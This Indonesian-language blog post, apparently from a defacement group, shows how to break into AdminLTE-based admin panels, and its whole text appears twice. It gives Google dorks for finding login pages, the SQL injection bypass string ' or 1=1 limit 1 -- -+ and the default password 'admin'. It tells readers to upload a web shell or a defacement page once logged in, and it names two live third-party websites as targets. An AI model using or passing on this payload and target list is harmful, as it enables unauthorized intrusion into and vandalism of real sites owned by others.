Deface Metode Login Form AdminLTE (Vulnerability Bypass Sqli Login & Admin Poor Password)
Saturday, March 7, 2020
Edit
Author: BabyMoon aka. RomDhoni7
Proof of Concept (POC): Login Form AdminLTE (Vulnerability Bypass Sqli Login & Admin Poor Password).
Penjelasan: Kerentanan terjadi karena kesalahan programmer dalam memodifikasi template AdminLTE, sehingga rentan terkena serangan bypass admin.
Dork: intitle:adminLTE inurl:admin
intitle:adminLTE inurl:login intext:username
etc.
Exploit: -
Step by Step:
Dork dulu pake dork diatas.
password:
' or 1=1 limit 1 -- -+
admin
pilih salah satu target, lalu kasih salah satu password diatas di form loginnya
*contoh saya memasukan username dan passwordnya “admin”
Dah masuk:v. Tinggal kalian upshell atau jso
~Live Target:
http://sisekar.com/index.php/welcome/login
http://hawacom.vn/hawacom.vn/bccn/login/view/AdminLTE-master/pages/calendar.html
Proof of Concept (POC): Login Form AdminLTE (Vulnerability Bypass Sqli Login & Admin Poor Password).
Penjelasan: Kerentanan terjadi karena kesalahan programmer dalam memodifikasi template AdminLTE, sehingga rentan terkena serangan bypass admin.
Dork: intitle:adminLTE inurl:admin
intitle:adminLTE inurl:login intext:username
etc.
Exploit: -
Step by Step:
Dork dulu pake dork diatas.
password:
' or 1=1 limit 1 -- -+
admin
pilih salah satu target, lalu kasih salah satu password diatas di form loginnya
*contoh saya memasukan username dan passwordnya “admin”
Dah masuk:v. Tinggal kalian upshell atau jso
~Live Target:
http://sisekar.com/index.php/welcome/login
http://hawacom.vn/hawacom.vn/bccn/login/view/AdminLTE-master/pages/calendar.html